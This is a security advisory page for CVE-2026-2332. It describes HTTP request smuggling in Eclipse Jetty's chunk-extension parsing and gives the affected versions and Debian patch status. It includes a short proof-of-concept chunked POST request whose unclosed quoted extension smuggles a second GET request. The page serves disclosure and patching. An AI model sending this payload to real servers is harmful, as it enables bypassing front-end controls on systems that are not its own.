CVE-2026-2332

EUVD-2026-22243
In Eclipse Jetty, the HTTP/1.1 parser is vulnerable to request smuggling when chunk extensions are used, similar to the "funky chunks" techniques outlined here:
  *  https://w4ke.info/2025/06/18/funky-chunks.html

  *  https://w4ke.info/2025/10/29/funky-chunks-2.html


Jetty terminates chunk extension parsing at \r\n inside quoted strings instead of treating this as an error.


POST / HTTP/1.1
Host: localhost
Transfer-Encoding: chunked

1;ext="val
X
0

GET /smuggled HTTP/1.1
...





Note how the chunk extension does not close the double quotes, and it is able to inject a smuggled request.
HTTP Request/Response Smuggling
ProviderTypeBase ScoreAtk. VectorAtk. ComplexityPriv. RequiredVector
eclipseCNA
7.4 HIGH
NETWORK
HIGH
NONE
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
Base Score
CVSS 3.x
EPSS Score
Percentile: Unknown
Early Detection
Affected products identified ahead of NVD analysis through intelligence sources.
VendorProductVersionSource
eclipsejetty
12.1.0 ≤
𝑥
≤ 12.1.6
CNA
eclipsejetty
12.0.0 ≤
𝑥
≤ 12.0.32
CNA
eclipsejetty
11.0.0 ≤
𝑥
≤ 11.0.27
CNA
eclipsejetty
10.0.0 ≤
𝑥
≤ 10.0.27
CNA
eclipsejetty
9.4.0 ≤
𝑥
≤ 9.4.59
CNA
Debian logo
Debian Releases
Debian Product
Codename
jetty12
forky
12.0.33-1
fixed
sid
12.0.33-1
fixed
trixie
vulnerable
trixie (security)
vulnerable
jetty9
bookworm
vulnerable
bookworm (security)
vulnerable
bullseye
vulnerable
bullseye (security)
vulnerable
forky
vulnerable
sid
vulnerable
trixie
vulnerable
trixie (security)
vulnerable
Common Weakness Enumeration
References
https://github.com/jetty/jetty.project/security/advisories/GHSA-355h-qmc2-wpwf
https://gitlab.eclipse.org/security/cve-assignment/-/issues/89